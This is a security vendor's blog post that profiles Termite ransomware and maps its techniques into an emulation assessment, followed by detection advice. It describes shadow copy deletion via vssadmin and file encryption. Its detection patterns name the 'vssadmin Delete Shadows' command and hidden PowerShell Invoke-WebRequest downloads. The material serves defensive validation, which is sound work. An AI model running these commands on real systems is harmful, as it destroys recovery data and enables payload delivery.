Termite is a ransomware strain, emerged in November 2024, that quickly established itself as a significant threat following its attribution to multiple high-profile cyberattacks which disrupted operations across multiple industries.

Its operators conduct highly targeted activities, typically initiated through phishing attacks, compromised websites, or the exploitation of software vulnerabilities to acquire initial access to victim environments. Once a foothold is established, Termite employs double extortion tactics by combining data exfiltration with file encryption to maximize pressure on victims by threatening both operational downtime and data exposure.

Termite is widely believed to be based on Babuk Ransomware, a defunct strain whose source code was leaked in 2021. While Babuk’s influence remains evident, particularly in encryption routines and general behavior, Termite distinguishes itself by aggressively targeting environment-specific vulnerabilities.

The group rose to prominence following its November 2024 attack on Blue Yonder, a major provider of supply chain management solutions. The incident disrupted operations across multiple regions for multiple global corporations, illustrating the ransomware’s potential for widespread impact through the compromise of third-party service providers.

Notably, CL0P ransomware operators also claimed Blue Yonder as a victim, leading to speculation regarding potential connections, shared tactics, or overlapping exploitation paths. While no direct affiliation has been established between the two groups, their convergence on the same high-profile target highlights the interconnected nature and growing complexity of the ransomware ecosystem.

AttackIQ has released a new attack graph composed the several Tactics, Techniques and Procedures (TTPs) exhibited by Termite ransomware during its most recent activities with the aim of helping customers validate their security controls and their ability to defend against this sophisticated and recent threat.

Validating your security program performance against these behaviors is vital in reducing risk. By using this new assessment template in the AttackIQ Security Optimization Platform, security teams will be able to:

  • Evaluate security control performance against baseline behaviors associated with the Termite ransomware.
  • Assess their security posture against an opportunistic adversary, which does not discriminate when it comes to selecting its targets.
  • Continuously validate detection and prevention pipelines against a playbook similar to those of many of the groups currently focused on ransomware activities.

[Malware Emulation] Termite Ransomware – 2024-12 – Associated Tactics, Techniques and Procedures (TTPs)

This emulation replicates the sequence of behaviors associated with the deployment of Termite ransomware on a compromised system with the intent of providing customers with the opportunity to detect and/or prevent a compromise in progress.

The assessment template is based on behaviors reported by Cyble on December 6, 2024, and Joe Sandbox on December 13, 2024.

Initial Access, Discovery & Impact – Local System Reconnaissance

This stage begins with the deployment of Termite ransomware which, once operational, retrieves the system’s Globally Unique Identifier (GUID) and proceeds to enumerate running services and processes via Windows API calls. Finally, it will execute vssadmin.exe to delete available Volume Shadow Copies.

Ingress Tool Transfer (T1105): This scenario downloads to memory and saves to disk in independent scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

Query Registry (T1012): This scenario queries the MachineGUID value located within the HKLM\SOFTWARE\Microsoft\Cryptography registry key which contains the unique identifier of the system.

System Service Discovery (T1007): This scenario executes the QueryServiceStatusEx and EnumDependentServices Windows API calls to retrieve information pertaining to a given service.

Process Discovery (T1057): This scenario uses Windows API to receive a list of running processes by calling CreateToolhelp32Snapshot and iterating through each process object with Process32FirstW and Process32NextW.

Inhibit System Recovery (T1490): This scenario executes the vssadmin.exe Windows utility to delete a Volume Shadow Copy created by the emulation.

Discovery & Impact – Termite Ransomware File Encryption

This stage begins by gathering information regarding the underlying hardware, followed by the discovery of accessible network shares, volumes and logical disks. The file system is then systematically traversed to identify files of interest, which are subsequently encrypted using a combination of ChaCha20 and Elliptic-curve Diffie–Hellman (ECDH) Curve 25519.

System Information Discovery (T1082): This scenario executes the GetSystemInfo Native API call to retrieve information associated to the system.

Network Share Discovery (T1135): This scenario executes the NetShareEnum Windows native API call to enumerate network shares from the local computer.

System Information Discovery (T1082): This scenario executes the FindFirstVolumeW and FindNextVolumeW Windows API calls to iterate through the available volumes of the system.

System Information Discovery (T1082): This scenario executes the GetLogicalDrives Windows API call to retrieve the currently available disk drives.

System Information Discovery (T1082): This scenario executes the GetDriveTypeW Windows API call to retrieve information regarding the system’s physical drives.

File and Directory Discovery (T1083): This scenario executes the FindFirstFileW and FindNextFileW Windows API calls to perform the enumeration of the file system.

Data Encrypted for Impact (T1486): This scenario performs the file encryption routines used by common ransomware families. Files matching an extension list are identified and encrypted in place using similar encryption algorithms as used by Babuk ransomware.

Detection and Mitigation Opportunities

Given the number of different techniques being utilized by this threat, it can be difficult to know which to prioritize for prevention and detection opportunities. AttackIQ recommends first focusing on the following techniques emulated in our scenarios before moving on to the remaining techniques.

1. Ingress Tool Transfer (T1105):

This actor relies heavily in downloading additional stages of malware. Endpoint and Network security controls should both be employed to try and detect the delivery of these malicious payloads.

1a. Detection

The following signatures can help identify when native utilities are being used to download malicious payloads.

PowerShell Example:

Process Name == (Cmd.exe OR Powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest") AND “DownloadData” AND “Hidden”)

1b. Mitigation

MITRE ATT&CK has the following mitigation recommendations.

2. Inhibit System Recovery (T1490):

Adversaries often delete Volume Shadow Copies to prevent the possibility of restoring files back to their original state. This is a common technique used by ransomware as it prevents the recovery of files once the ransomware encryption routine successfully completes execution.

2a. Detection

Detecting deletion of Volume Shadow Copies is usually the first step that occurs and can be detected by looking at the command line activity

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (“vssadmin” AND “Delete Shadows”)

2b. Mitigation

MITRE ATT&CK has the following mitigation recommendations for Inhibit System Recovery

Wrap-up

In summary, this attack graph will evaluate security and incident response processes and support the improvement of your security control posture against the behaviors exhibited by Termite ransomware operators. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against a known and dangerous threat.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.